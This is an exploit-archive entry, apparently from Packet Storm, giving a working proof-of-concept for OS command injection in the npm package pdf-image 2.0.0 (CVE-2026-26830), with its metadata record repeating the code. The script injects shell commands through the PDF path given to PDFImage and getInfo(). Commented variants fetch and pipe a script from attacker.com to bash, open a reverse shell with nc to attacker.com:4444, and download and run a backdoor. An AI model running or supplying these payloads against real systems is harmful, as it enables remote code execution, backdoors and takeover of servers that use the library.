📄 pdf-image 2.0.0 Command Injection_PACKETSTORM:219847

9.8 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Description

In pdf-image version 2.0.0, a security issue allows OS command injection when untrusted input is passed to the PDFImage constructor and later processed by methods such as getInfo...

Visit Original Source

Basic Information

ID PACKETSTORM:219847

Published Apr 27, 2026 at 00:00

Affected Product

Affected Versions ==================================================================================================================================
| # Title : pdf-image 2.0.0 OS Command Injection via Unescaped PDF Path in PDFImage.getInfo() |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.npmjs.com/package/pdf-image |
==================================================================================================================================

[+] Summary : In pdf-image version 2.0.0, a security issue allows OS command injection when untrusted input is passed to the PDFImage constructor and later processed by methods such as getInfo().

[+] POC :

// exploit.js
const { PDFImage } = require("pdf-image");
const maliciousPdfPath = 'test.pdf"; touch /tmp/pwned.txt; echo "';

// const maliciousPdfPath = 'test.pdf"; curl http://attacker.com/shell.sh | bash; echo "';
// const maliciousPdfPath = 'test.pdf"; nc -e /bin/sh attacker.com 4444; echo "';
// const maliciousPdfPath = 'test.pdf"; wget http://attacker.com/backdoor -O /tmp/backdoor && chmod +x /tmp/backdoor && /tmp/backdoor; echo "';

console.log("[+] CVE-2026-26830 - PDFImage OS Command Injection Exploit");
console.log("[+] Malicious PDF path:", maliciousPdfPath);
console.log("[+] Creating PDFImage instance...");

const pdfImage = new PDFImage(maliciousPdfPath);

console.log("[+] Calling getInfo() to trigger the vulnerability...");

pdfImage.getInfo()
.then((info) => {
console.log("[!] getInfo() succeeded unexpectedly (injection might still have worked)");
console.log("Info:", info);
})
.catch((err) => {
console.log("[!] getInfo() failed (but command may have executed before the error)");
console.log("Error:", err.message);
})
.finally(() => {
console.log("[*] Check if the command executed by running: cat /tmp/pwned.txt");
console.log("[*] If the file exists, the exploit was successful!");
});

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================

{
    "lastseen": "2026-04-27T16:32:59",
    "description": "In pdf-image version 2.0.0, a security issue allows OS command injection when untrusted input is passed to the PDFImage constructor and later processed by methods such as getInfo...",
    "published": "2026-04-27T00:00:00",
    "modified": "2026-04-27T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 pdf-image 2.0.0 Command Injection",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:219847",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2026-26830"
    ],
    "sourceData": "==================================================================================================================================\n    | # Title     : pdf-image 2.0.0 OS Command Injection via Unescaped PDF Path in PDFImage.getInfo()                                |\n    | # Author    : indoushka                                                                                                        |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |\n    | # Vendor    : https://www.npmjs.com/package/pdf-image                                                                          |\n    ==================================================================================================================================\n    \n    [+] Summary    : In pdf-image version 2.0.0, a security issue allows OS command injection when untrusted input is passed to the PDFImage constructor and later processed by methods such as getInfo().\n    \n    \n    [+] POC        :  \n    \n    // exploit.js\n    const { PDFImage } = require(\"pdf-image\");\n    const maliciousPdfPath = 'test.pdf\"; touch /tmp/pwned.txt; echo \"';\n    \n    // const maliciousPdfPath = 'test.pdf\"; curl http://attacker.com/shell.sh | bash; echo \"';\n    // const maliciousPdfPath = 'test.pdf\"; nc -e /bin/sh attacker.com 4444; echo \"';\n    // const maliciousPdfPath = 'test.pdf\"; wget http://attacker.com/backdoor -O /tmp/backdoor && chmod +x /tmp/backdoor && /tmp/backdoor; echo \"';\n    \n    console.log(\"[+] CVE-2026-26830 - PDFImage OS Command Injection Exploit\");\n    console.log(\"[+] Malicious PDF path:\", maliciousPdfPath);\n    console.log(\"[+] Creating PDFImage instance...\");\n    \n    const pdfImage = new PDFImage(maliciousPdfPath);\n    \n    console.log(\"[+] Calling getInfo() to trigger the vulnerability...\");\n    \n    pdfImage.getInfo()\n        .then((info) => {\n            console.log(\"[!] getInfo() succeeded unexpectedly (injection might still have worked)\");\n            console.log(\"Info:\", info);\n        })\n        .catch((err) => {\n            console.log(\"[!] getInfo() failed (but command may have executed before the error)\");\n            console.log(\"Error:\", err.message);\n        })\n        .finally(() => {\n            console.log(\"[*] Check if the command executed by running: cat /tmp/pwned.txt\");\n            console.log(\"[*] If the file exists, the exploit was successful!\");\n        });\n    \t\n    \t\n    Greetings to :==============================================================================\n    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\n    ============================================================================================",
    "sourceHref": "https://packetstorm.news/download/219847",
    "cvss": {
        "score": 9.8,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/219847/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply